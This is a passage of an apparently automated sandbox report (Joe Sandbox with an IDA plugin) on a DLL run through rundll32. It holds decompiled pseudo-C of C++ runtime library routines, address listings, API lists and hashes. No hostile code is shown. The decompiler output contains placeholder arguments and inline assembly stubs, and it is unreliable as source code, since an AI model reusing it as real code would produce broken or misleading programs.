																			 *0x6e2c6df0 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6E206FD3(__eflags, _t761);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6e2c6dbc = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6E206FD3(__eflags, _t760);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6e2c6dec = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6E206FD3(__eflags, _t759);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6e2c6db8 = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6E206FD3(__eflags, _t758);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6e2c6de8 = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}




























































                          0x6e20f183
                          0x6e20f183
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b4
                          0x6e20f1b9
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F18A
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F194
                          • int.LIBCPMT ref: 6E20F1AB
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • messages.LIBCPMT ref: 6E20F1CE
                          • std::_Facet_Register.LIBCPMT ref: 6E20F1E5
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F205
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F223
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID:
                          • API String ID: 438560357-0
                          • Opcode ID: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
                          • Instruction ID: 649ac8905262ea0ce9a5533c418bffb154387899aa8052279c3b24696cb4d61b
                          • Opcode Fuzzy Hash: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
                          • Instruction Fuzzy Hash: A511E37A90051DCFCF00DBE0C898AEEB77BBF84719F240909E4206B2D0DBB49A80C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25621F, Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6E25621F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6e2c506c; // 0x5cc08226
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E6E246BDB(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E6E21F8A5(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E6E20DEE1(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E6E254640(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E6E20DEE1(_t100);
									goto L36;
								}
								_t62 = E6E254640(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E6E20DEE1(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E6E24F26D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E6E2201B0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E6E254640(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6E24F26D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6E2201B0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}



























                          0x6e256224
                          0x6e256225
                          0x6e256226
                          0x6e25622d
                          0x6e256232
                          0x6e256238
                          0x6e25623e
                          0x6e256244
                          0x6e256247
                          0x6e256247
                          0x6e25624a
                          0x6e25624c
                          0x6e25624c
                          0x6e25624a
                          0x6e25624e
                          0x6e256253
                          0x6e25625a
                          0x6e25625d
                          0x6e25625d
                          0x6e256279
                          0x6e25627f
                          0x6e256284
                          0x6e256417
                          0x6e25641b
                          0x6e25642a
                          0x6e25628a
                          0x6e25628a
                          0x6e25628d
                          0x6e256292
                          0x6e256296
                          0x6e2562ea
                          0x6e2562ea
                          0x6e2562ec
                          0x6e2562ee
                          0x6e25640c
                          0x6e25640c
                          0x6e25640e
                          0x6e25640f
                          0x00000000
                          0x6e256415
                          0x6e2562ff
                          0x6e256305
                          0x6e256307
                          0x00000000
                          0x00000000
                          0x6e25630d
                          0x6e25631f
                          0x6e256324
                          0x6e256328
                          0x00000000
                          0x00000000
                          0x6e256335
                          0x6e25636f
                          0x6e256372
                          0x6e256375
                          0x6e256377
                          0x6e256379
                          0x6e25637b
                          0x6e2563c7
                          0x6e2563c7
                          0x6e2563c9
                          0x6e2563c9
                          0x6e2563cb
                          0x6e256405
                          0x6e256406
                          0x00000000
                          0x6e25640b
                          0x6e2563df
                          0x6e2563e4
                          0x6e2563e6
                          0x00000000
                          0x00000000
                          0x6e2563ea
                          0x6e2563eb
                          0x6e2563ec
                          0x6e2563ef
                          0x6e25642b
                          0x6e25642e
                          0x6e2563f1
                          0x6e2563f1
                          0x6e2563f2
                          0x6e2563f2
                          0x6e2563ff
                          0x6e256401
                          0x6e256403
                          0x6e256434
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e256403
                          0x6e25637d
                          0x6e256380
                          0x6e256382
                          0x6e256384
                          0x6e256386
                          0x6e256389
                          0x6e25638e
                          0x6e2563a9
                          0x6e2563ab
                          0x6e2563b5
                          0x6e2563b7
                          0x6e2563b8
                          0x6e2563ba
                          0x00000000
                          0x00000000
                          0x6e2563bc
                          0x6e2563c2
                          0x6e2563c2
                          0x00000000
                          0x6e2563c2
                          0x6e256390
                          0x6e256392
                          0x6e256396
                          0x6e25639b
                          0x6e25639d
                          0x6e25639f
                          0x00000000
                          0x00000000
                          0x6e2563a1
                          0x00000000
                          0x6e2563a1
                          0x6e256337
                          0x6e25633c
                          0x00000000
                          0x00000000
                          0x6e256342
                          0x6e256344
                          0x00000000
                          0x00000000
                          0x6e25635b
                          0x6e256360
                          0x6e256364
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25636a
                          0x6e25629d
                          0x6e25629f
                          0x6e2562a1
                          0x6e2562a9
                          0x6e2562c8
                          0x6e2562ca
                          0x6e2562d4
                          0x6e2562d6
                          0x6e2562d7
                          0x6e2562d9
                          0x00000000
                          0x00000000
                          0x6e2562df
                          0x6e2562e5
                          0x6e2562e5
                          0x00000000
                          0x6e2562e5
                          0x6e2562ad
                          0x6e2562b1
                          0x6e2562b6
                          0x6e2562ba
                          0x00000000
                          0x00000000
                          0x6e2562c0
                          0x00000000
                          0x6e2562c0

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E23F290,6E23F290,?,?,?,6E256470,00000001,00000001,C5E85006), ref: 6E256279
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E256470,00000001,00000001,C5E85006,?,?,?), ref: 6E2562FF
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2563F9
                          • __freea.LIBCMT ref: 6E256406
                            • Part of subcall function 6E24F26D: HeapAlloc.KERNEL32(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          • __freea.LIBCMT ref: 6E25640F
                          • __freea.LIBCMT ref: 6E256434
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocHeap
                          • String ID:
                          • API String ID: 3147120248-0
                          • Opcode ID: 2cbfe14d0f3fffbb7407882d1e102d55e48eef0a9264cff3066efff1a7d68af9
                          • Instruction ID: c0875fdc6f949447c3dd43aeb7607c4dbc10faf2bd5cc5e17263358a06b767a1
                          • Opcode Fuzzy Hash: 2cbfe14d0f3fffbb7407882d1e102d55e48eef0a9264cff3066efff1a7d68af9
                          • Instruction Fuzzy Hash: 4251C47262021BAFEB258FE4CD90EBB77ABEB44750F154669EC14DA240DF34DC61C690
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2423DD, Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E6E2423DD(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				void* _t120;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
